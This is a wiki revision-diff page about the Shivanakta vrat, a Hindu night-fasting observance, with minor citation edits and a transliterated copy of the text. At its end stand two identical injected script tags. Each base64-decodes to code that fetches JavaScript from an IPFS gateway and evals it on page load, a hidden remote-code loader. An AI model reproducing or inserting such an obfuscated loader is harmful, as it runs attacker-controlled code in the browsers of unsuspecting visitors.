Difference between revisions of "शिवनक्त व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[कृष्ण पक्ष]] की [[अष्टमी]] या [[चर्तुदशी]] पर नक्त विधि शिवनक्तव्रत किया जाता है।
 
*[[कृष्ण पक्ष]] की [[अष्टमी]] या [[चर्तुदशी]] पर नक्त विधि शिवनक्तव्रत किया जाता है।
*[[इहलोक]] में आनन्द एवं मृत्युपरान्त [[शिवलोक]] की प्राप्ति होती है।<ref>(कृत्यकल्पतरु 386); हेमाद्रि (व्रत खण्ड 2, 398, [[भविष्यपुराण]] से उद्धरण)</ref>  
+
*[[इहलोक]] में आनन्द एवं मृत्युपरान्त [[शिवलोक]] की प्राप्ति होती है।<ref>कृत्यकल्पतरु 386); हेमाद्रि (व्रत खण्ड 2, 398, [[भविष्यपुराण]] से उद्धरण</ref>  
 
*ऐसी मान्यता है कि एक वर्ष के प्रत्येक पर्व पर नक्त रहना चाहिए।
 
*ऐसी मान्यता है कि एक वर्ष के प्रत्येक पर्व पर नक्त रहना चाहिए।
 
*एक वर्ष तक [[शिव]] पूजा करनी चाहिए।<ref>कृत्यकल्पतरु व्रत खण्ड 386</ref>
 
*एक वर्ष तक [[शिव]] पूजा करनी चाहिए।<ref>कृत्यकल्पतरु व्रत खण्ड 386</ref>
 
*अष्टमी, [[नवमी]], [[त्रयोदशी]] एवं चतुर्दशी पर कर्ता केवल एकभक्त रहता है, [[पृथ्वी देवी|पृथ्वी]] पर रखा भोजन करता है।
 
*अष्टमी, [[नवमी]], [[त्रयोदशी]] एवं चतुर्दशी पर कर्ता केवल एकभक्त रहता है, [[पृथ्वी देवी|पृथ्वी]] पर रखा भोजन करता है।
*शिवनक्तव्रत एक वर्ष तक करना चाहिए।<ref>कृत्यकल्पतरु (व्रत खण्द 386-387)</ref>
+
*शिवनक्तव्रत एक वर्ष तक करना चाहिए।<ref>कृत्यकल्पतरु (व्रत खण्द 386-387</ref>
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Latest revision as of 12:57, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • krishna paksh ki ashtami ya chartudashi par nakt vidhi shivanaktavrat kiya jata hai.
  • ihalok mean anand evan mrityuparant shivalok ki prapti hoti hai.[1]
  • aisi manyata hai ki ek varsh ke pratyek parv par nakt rahana chahie.
  • ek varsh tak shiv pooja karani chahie.[2]
  • ashtami, navami, trayodashi evan chaturdashi par karta keval ekabhakt rahata hai, prithvi par rakha bhojan karata hai.
  • shivanaktavrat ek varsh tak karana chahie.[3]

tika tippani aur sandarbh

  1. krityakalpataru 386); hemadri (vrat khand 2, 398, bhavishyapuran se uddharan
  2. krityakalpataru vrat khand 386
  3. krityakalpataru (vrat khand 386-387

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>